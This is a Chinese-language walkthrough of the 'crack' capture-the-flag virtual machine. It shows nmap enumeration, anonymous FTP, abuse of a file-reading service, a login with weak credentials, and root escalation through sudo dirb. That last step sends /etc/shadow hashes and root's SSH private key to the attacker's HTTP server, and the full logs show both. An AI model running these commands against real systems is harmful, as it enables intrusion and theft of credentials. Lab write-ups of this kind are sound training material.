crack

2023-07-27

┌──(root㉿kali)-[/home/ace]
└─# nmap -sC -sV -p- 192.168.56.133
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-27 08:49 CST
Nmap scan report for 192.168.56.133
Host is up (0.0016s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
21/tcp    open  ftp      vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxrwxrwx    2 0        0            4096 Jun 07 14:40 upload [NSE: writeable]
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.127
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
4200/tcp  open  ssl/http ShellInABox
|_http-title: Shell In A Box
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=crack
| Not valid before: 2023-06-07T10:20:13
|_Not valid after:  2043-06-02T10:20:13
12359/tcp open  unknown
| fingerprint-strings: 
|   GenericLines: 
|     File to read:NOFile to read:
|   NULL: 
|_    File to read:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port12359-TCP:V=7.93%I=7%D=7/27%Time=64C1BF1F%P=x86_64-pc-linux-gnu%r(N
SF:ULL,D,"File\x20to\x20read:")%r(GenericLines,1C,"File\x20to\x20read:NOFi
SF:le\x20to\x20read:");
MAC Address: 08:00:27:26:25:3E (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.34 seconds

2.登录ftp服务

我们发现ftp存在一个登录账号anonymous,登陆查看一下

┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.133                                                                                                               
Connected to 192.168.56.133.
220 (vsFTPd 3.0.3)
Name (192.168.56.133:ace): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

3.查看一下存在什么文件

┌──(root㉿kali)-[/home/ace]
└─# ftp 192.168.56.133
Connected to 192.168.56.133.
220 (vsFTPd 3.0.3)
Name (192.168.56.133:ace): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46515|)
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Jun 07 14:40 upload
226 Directory send OK.
ftp> cd upload
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||31922|)
150 Here comes the directory listing.
-rwxr-xr-x    1 1000     1000          849 Jun 07 14:40 crack.py
226 Directory send OK.
ftp> get crack.py
local: crack.py remote: crack.py
229 Entering Extended Passive Mode (|||24898|)
150 Opening BINARY mode data connection for crack.py (849 bytes).
100% |*****************************************************************************************************|   849      297.48 KiB/s    00:00 ETA
226 Transfer complete.
849 bytes received in 00:00 (140.83 KiB/s)
ftp>

打开文件看看：

import os
import socket
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = 12359
s.bind(('', port))
s.listen(50)

c, addr = s.accept()
no = "NO"
while True:
        try:
                c.send('File to read:'.encode())
                data = c.recv(1024)
                file = (str(data, 'utf-8').strip())
                filename = os.path.basename(file)
                check = "/srv/ftp/upload/"+filename
                if os.path.isfile(check) and os.path.isfile(file):
                        f = open(file,"r")
                        lines = f.readlines()
                        lines = str(lines)
                        lines = lines.encode()
                        c.send(lines)
                else:
                        c.send(no.encode())
        except ConnectionResetError:
                pass

深入分析它似乎是一个在端口 12359 上运行的脚本，这将要求我们提供系统文件，如果该文件也存在于路径 /srv/ftp/upload 中，它将向我们发送系统中现有文件的内容。

写个文件上传试试：

1 2	┌──(root㉿kali)-[/home/ace] └─# echo "123" >passwd

ftp> put passwd
local: passwd remote: passwd
229 Entering Extended Passive Mode (|||36024|)
150 Ok to send data.
100% |*****************************************************************************************************|     4       20.45 KiB/s    00:00 ETA
226 Transfer complete.
4 bytes sent in 00:00 (0.66 KiB/s)
ftp> ls
229 Entering Extended Passive Mode (|||49954|)
150 Here comes the directory listing.
-rwxr-xr-x    1 1000     1000          849 Jun 07 14:40 crack.py
-rw-------    1 107      114             4 Jul 27 03:43 passwd
226 Directory send OK.
ftp>

连接一下端口：

┌──(root㉿kali)-[/home/ace]
└─# nc 192.168.56.133 12359
File to read:/etc/passwd
['root:x:0:0:root:/root:/bin/bash\n', 'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n', 'bin:x:2:2:bin:/bin:/usr/sbin/nologin\n', 'sys:x:3:3:sys:/dev:/usr/sbin/nologin\n', 'sync:x:4:65534:sync:/bin:/bin/sync\n', 'games:x:5:60:games:/usr/games:/usr/sbin/nologin\n', 'man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n', 'lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n', 'mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n', 'news:x:9:9:news:/var/spool/news:/usr/sbin/nologin\n', 'uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\n', 'proxy:x:13:13:proxy:/bin:/usr/sbin/nologin\n', 'www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n', 'backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n', 'list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\n', 'irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\n', 'gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\n', 'nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n', '_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n', 'systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\n', 'systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\n', 'messagebus:x:103:109::/nonexistent:/usr/sbin/nologin\n', 'systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\n', 'sshd:x:105:65534::/run/sshd:/usr/sbin/nologin\n', 'cris:x:1000:1000:cris,,,:/home/cris:/bin/bash\n', 'systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\n', 'shellinabox:x:106:112:Shell In A Box,,,:/var/lib/shellinabox:/usr/sbin/nologin\n', 'ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin\n']File to read:

sync说明可以连接：

cris是个可疑用户，用shell in A box连接一下

查看前面的扫描结果，发现存在shellinabox的存在

4.shellinabox登录：

crack login: cris                                                                                                                                                                                                              
Password: cris                                                                                                                                                                                                                     
Linux crack 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64                                                                       
The programs included with the Debian GNU/Linux system are free software;                                                                                                                                                      
the exact distribution terms for each program are described in the                                                                   individual files in /usr/share/doc/*/copyright.  
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent                                                                                                                                                              
permitted by applicable law.                                                                                                                                                                                                   
Last login: Wed Jun  7 14:39:38 CEST 2023 from 192.168.0.100 on pts/0                                                                                                                                                          
cris@crack:~$ ls                                                                                                                                                                                                               
crack.py  user.txt  ziempre.py
cris@crack:~$ cat user.txt                                                                                                                                                                                                     
eG4TUsTBxSFjTOPHMV                                                                                                                                                                                                             
cris@crack:~$

5.sudo 提权

Dirb 是网站的模糊器，所以我已经可以想象如何利用这一点。我所做的是在我的机器上运行一个带有python的Web服务器，然后尝试使用一些具有特权信息的系统文件作为字典对其进行模糊处理。

cris@crack:~$ sudo -u root /usr/bin/dirb http://192.168.56.127/ /etc/shadow       
-----------------                                                                            
DIRB v2.22                                                                       
By The Dark Raver                                                                     
-----------------                
START_TIME: Thu Jul 27 06:05:15 2023
URL_BASE: http://192.168.56.127/                                                              
WORDLIST_FILES: /etc/shadow                                            
-----------------                                            
GENERATED WORDS: 28                                                                                   
---- Scanning URL: http://192.168.56.127/ ----                                                                                           
-----------------                                                                      
END_TIME: Thu Jul 27 06:05:15 2023                                                                          
DOWNLOADED: 28 - FOUND: 0                                                                
cris@crack:~$

┌──(root㉿kali)-[/home/ace]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /frand2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /root:$y$j9T$LVT9GIrLdk5L.xns1akJZ1$wmigJ7er07AT/VwIAuYSZ3j94LOCe8EJHC6d2mlZVo3:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /daemon:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /bin:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sys:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sync:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /games:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /man:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /lp:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /mail:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /news:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /uucp:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /proxy:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /www-data:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /backup:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /list:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /irc:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /gnats:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /nobody:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /_apt:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-network:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-resolve:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /messagebus:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-timesync:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /sshd:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /cris:$y$j9T$kFXVxpRhH2ZAeDGNazqRq/$IokBR4XhhyRJOur8YOHu3fF59/0NOHC5AIsvkxXx8..:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /systemd-coredump:!*:19515:::::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /shellinabox:*:19515:0:99999:7::: HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:05:16] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:05:16] "GET /ftp:*:19515:0:99999:7::: HTTP/1.1" 404 -

通过这种方式，我们可以试试得到id_rsa

cris@crack:~$ sudo -u root /usr/bin/dirb http://192.168.56.127/ /root/.ssh/id_rsa 
-----------------                                                                 
DIRB v2.2                                                                          
By The Dark Raver
-----------------
START_TIME: Thu Jul 27 06:13:33 2023                                                  
URL_BASE: http://192.168.56.127/                                             
WORDLIST_FILES: /root/.ssh/id_rsa                                                                                
-----------------
GENERATED WORDS: 38                                                                             
---- Scanning URL: http://192.168.56.127/ ----                                                                                           
-----------------
END_TIME: Thu Jul 27 06:13:34 2023 
DOWNLOADED: 38 - FOUND: 0                                                            
cris@crack:~$

┌──(root㉿kali)-[/home/ace]
└─# python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /randomfile1 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /frand2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /-----BEGIN HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /NhAAAAAwEAAQAAAYEAxBvRe3EH67y9jIt2rwa79tvPDwmb2WmYv8czPn4bgSCpFmhDyHwn HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /b0IUyyw3iPQ3LlTYyz7qEc2vaj1xqlDgtafvvtJ2EJAJCFy5osyaqbYKgAkGkQMzOevdGt HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /xNQ8NxRO4/bC1v90lUrhyLi/ML5B4nak+5vLFJi8NlwXMQJ/xCWZg5+WOLduFp4VvHlwAf HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /tDh2C+tJp2hqusW1jZRqSXspCfKLPt/v7utpDTKtofxFvSS55MFciju4dIaZLZUmiqoD4k HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET //+FwJbMna8iPwmvK6n/2bOsE1+nyKbkbvDG5pjQ3VBtK23BVnlxU4frFrbicU+VtkClfMu HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /yp7muWGA1ydvYUruoOiaURYupzuxw25Rao0Sb8nW1qDBYH3BETPCypezQXE22ZYAj0ThSl HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Kn2aZN/8xWAB+/t96TcXogtSbQw/eyp9ecmXUpq5i1kBbFyJhAJs7x37WM3/Cb34a/6v8c HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /9rMjGl9HMZFDwswzAGrvPOeroVB/TpZ+UBNGE1znAAAFgC5UADIuVAAyAAAAB3NzaC1yc2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /EAAAGBAMQb0XtxB+u8vYyLdq8Gu/bbzw8Jm9lpmL/HMz5+G4EgqRZoQ8h8J29CFMssN4j0 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Ny5U2Ms+6hHNr2o9capQ4LWn777SdhCQCQhcuaLMmqm2CoAJBpEDMznr3RrcTUPDcUTuP2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /wtb/dJVK4ci4vzC+QeJ2pPubyxSYvDZcFzECf8QlmYOflji3bhaeFbx5cAH7Q4dgvrSado HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /arrFtY2Uakl7KQnyiz7f7+7raQ0yraH8Rb0kueTBXIo7uHSGmS2VJoqqA+JP/hcCWzJ2vI HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /j8Jryup/9mzrBNfp8im5G7wxuaY0N1QbSttwVZ5cVOH6xa24nFPlbZApXzLsqe5rlhgNcn HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /b2FK7qDomlEWLqc7scNuUWqNEm/J1tagwWB9wREzwsqXs0FxNtmWAI9E4UpSp9mmTf/MVg HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Afv7fek3F6ILUm0MP3sqfXnJl1KauYtZAWxciYQCbO8d+1jN/wm9+Gv+r/HPazIxpfRzGR HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Q8LMMwBq7zznq6FQf06WflATRhNc5wAAAAMBAAEAAAGAeX9uopbdvGx71wZUqo12iLOYLg HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /3a87DbhP2KPw5sRe0RNSO10xEwcVq0fUfQxFXhlh/VDN7Wr98J7b1RnZ5sCb+Y5lWH9iz2 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /m6qvDDDNJZX2HWr6GX+tDhaWLt0MNY5xr64XtxLTipZxE0n2Hueel18jNldckI4aLbAKa/ HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /a4rL058j5AtMS6lBWFvqxZFLFr8wEECdBlGoWzkjGJkMTBsPLP8yzEnlipUxGgTR/3uSMN HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /peiKDzLI/Y+QcQku/7GmUIV4ugP0fjMnz/XcXqe6GVNX/gvNeT6WfKPCzcaXiF4I2i228u HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /TB9Ga5PNU2nYzJAQcAVvDwwC4IiNsDTdQY+cSOJ0KCcs2cq59EaOoZHY6Od88900V3MKFG HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /TwielzW1Nqq1ltaQYMtnILxzEeXJFp6LlqFTF4Phf/yUyK04a6mhFg3kJzsxE+iDOVH28D HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Unj2OgO53KJ2FdLBHkUDlXMaDsISuizi0aj2MnhCryfHefhIsi1JdFyMhVuXCzNGUBAAAA HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /wQDlr9NWE6q1BovNNobebvw44NdBRQE/1nesegFqlVdtKM61gHYWJotvLV79rjjRfjnGHo HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /0MoSXZXiC/0/CSfe6Je7unnIzhiA85jSe/u2dIviqItTc2CBRtOZl7Vrflt7lasT7J1WAO HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /1ROwaN5uL26gIgtf/Y7Rhi0wFPN289UI2gjeVQKhXBObVm3qY7yZh8JpLPH5w0Xeuo20sP HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /WchZl0D8KSZUKhlPU6Pibqmj9bAAm7hwFecuQMeS+nxg1qIGYAAADBAOZ1XurOyyH9RWIo HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /0sTQ3d/kJNgTNHAs4Y0SxSOejC+N3tEU33GU3P+ppfHYy595rX7MX4o3gqXFpAaHRIAupr HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /DbenB1HQW4o6Gg+SF2GWPAQeuDbCsLM9P8XOiQIjTuCvYwHUdFD7nWMJ5Sqr6EeBV+CYw1 HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /Tg5PIU3FsnN5D3QOHVpGNo2qAvi+4CD0BC5fxOs6cZ1RBqbJ1kanw1H6fF8nRRBds+26Bl HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET //RGZHTBPLVenhNmWN2fje3GDBqVeIbZwAAAMEA2dfdjpefYEgtF0GMC9Sf5UzKIEKQMzoh HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /oxY6YRERurpcyYuSa/rxIP2uxu1yjIIcO4hpsQaoipTM0T9PS56CrO+FN9mcIcXCj5SVEq HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /2UVzu9LS0PdqPmniNmWglwvAbkktcEmbmCLYoh5GBxm9VhcL69dhzMdVe73Z9QhNXnMDlf HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /6xpD9lHWyp+ocD/meYC7V8aio/W9VxL25NlYwdFyCgecd/rIJQ+tGPXoqXIKrf5lVrVtFC HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /s8IoeeQHSidUKBAAAACnJvb3RAY3JhY2s= HTTP/1.1" 404 -
192.168.56.133 - - [27/Jul/2023 12:13:35] code 404, message File not found
192.168.56.133 - - [27/Jul/2023 12:13:35] "GET /-----END HTTP/1.1" 404 -

这可以拷贝出id_rsa

cris@crack:/tmp$ wget http://192.168.56.127/ssh.txt                                                                                                                                                                            
--2023-07-27 07:40:45--  http://192.168.56.127/ssh.txt
Conectando con 192.168.56.127:80... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 2629 (2,6K) [text/plain]
Grabando a: «ssh.txt.1»
ssh.txt.1                                               100%[==============================================================================================================================>]   2,57K  --.-KB/s    en 0,002s  
2023-07-27 07:40:45 (1,49 MB/s) - «ssh.txt.1» guardado [2629/2629]
cris@crack:/tmp$ ssh root@127.0.0.1 -i ssh.txt.1                                                             
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'ssh.txt.1' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "ssh.txt.1": bad permissions
root@127.0.0.1's password: 
cris@crack:/tmp$ chmod 600 ssh.txt.1                                              
cris@crack:/tmp$ ssh root@127.0.0.1 -i ssh.txt.1

sudo提权成功